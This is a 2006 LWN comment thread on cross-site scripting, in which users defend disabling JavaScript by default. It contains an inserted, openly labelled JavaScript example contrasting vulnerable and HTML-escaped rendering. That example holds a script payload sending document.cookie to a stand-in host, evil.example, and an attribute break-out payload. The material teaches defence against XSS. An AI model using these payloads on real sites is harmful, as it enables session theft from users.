
XSS is for real

Posted Apr 20, 2006 16:36 UTC (Thu) by Duncan (guest, #6647)
In reply to: XSS is for real by b7j0c
Parent article: Cross-site scripting attacks

Indeed, XSS is a very real security worry.

I agree with the no-script thing. Turning off Javascript "drastic", as
the article states? I don't /think/ so! Rather, it's been the default
here for a good eight years or more. Scripting (and back on MSWormOS,
ActiveHex, and on Linux, plugins) and cookies are always off by default,
only turned on after I find I need them and ask myself what trust level I
have for the site, and whether my need for what the site offers justifies
the necessary hassle. I can state for a fact that a site's poor choices
have not only redirected my viewing, but thousands of dollars worth of
purchases, over the years. If they aren't security conscious enough to
realize that some users visiting their site won't have certain things
enabled by default, and have the site designed so at least information
about a product can be gathered without /too/ much jumping through hoops to
turn stuff back on, then they obviously aren't concerned enough about
security to be worth my purchasing consideration, whether it's a site I'm
shopping right then with card in hand, or a manufacturer's site I'm
looking at for product info. There are other sites out there plenty
willing to let me be their customer, without the hassle.

FWIW, though, not Firefox here, but Konqueror, with its per-site scripting
and cookie permissions, and privoxy, filtering the worst stuff and setting
all cookies to session-only by default, before Konqueror even sees it.

Duncan
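The comment above says XSS is a very real worry and argues for keeping scripting off by default. As an added example (not part of this thread or the LWN article it replies to), here is what the browser-side switch protects against: a reflected-XSS sink in two output contexts, beside the hardened rendering that encodes untrusted input before it reaches markup. The "search page", the `evil.example` host, and the two payloads are constructed for illustration.

```javascript
// Added example, not code from the LWN thread. Everything here runs
// stand-alone under Node; the page fragments and payloads are constructed.

// Characters that must never reach an HTML text node or a double-quoted
// attribute value unencoded. Encoding the quotes is what closes the
// attribute-context hole shown below, not just encoding < and >.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode an untrusted string for insertion into HTML body text or into a
// double-quoted attribute value.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Text-node context, vulnerable: the query is concatenated straight into
// markup, so a query containing <script> becomes part of the page.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Text-node context, hardened: same page, encoder applied first.
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Attribute context, vulnerable: a stray double quote in the query closes
// the value attribute and lets the attacker add an event handler.
function renderInputVulnerable(query) {
  return `<input name="q" value="${query}">`;
}

// Attribute context, hardened: the quote is encoded as &quot;, so the
// attacker's text stays inside the attribute value.
function renderInputSafe(query) {
  return `<input name="q" value="${escapeHtml(query)}">`;
}

// Count tag starts (a '<' followed by a letter or '/'). A rendered page
// should contain exactly the tags the template wrote, no more.
function countTagStarts(html) {
  return (html.match(/<[a-zA-Z/]/g) || []).length;
}

// Constructed attacker inputs: a cookie-stealing script for the text
// context, and an attribute break-out for the input field.
const PAYLOAD =
  '<script>document.location="http://evil.example/?c="+document.cookie</script>';
const ATTR_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="';

console.log("vulnerable:", renderSearchVulnerable(PAYLOAD));
console.log("hardened:  ", renderSearchSafe(PAYLOAD));
console.log("vulnerable:", renderInputVulnerable(ATTR_PAYLOAD));
console.log("hardened:  ", renderInputSafe(ATTR_PAYLOAD));
```

With scripting disabled in the browser, the injected script and the injected `onfocus` handler never execute; with it enabled, only the server-side encoding stands between the attacker and the cookie. The hardened output still shows the attacker's text on the page, which is the intended behaviour: the text is displayed, not interpreted.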



XSS is for real

Posted Apr 23, 2006 15:42 UTC (Sun) by anton (subscriber, #25547)

>Turning off Javascript "drastic", as the article states? I don't
>/think/ so! Rather, it's been the default here for a good eight years
>or more.

On my accounts, I always turn off JavaScript (and a bunch of other
stuff), and *never* turn it on. And as for you, that certainly
affects what I buy.


Copyright © 2017, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds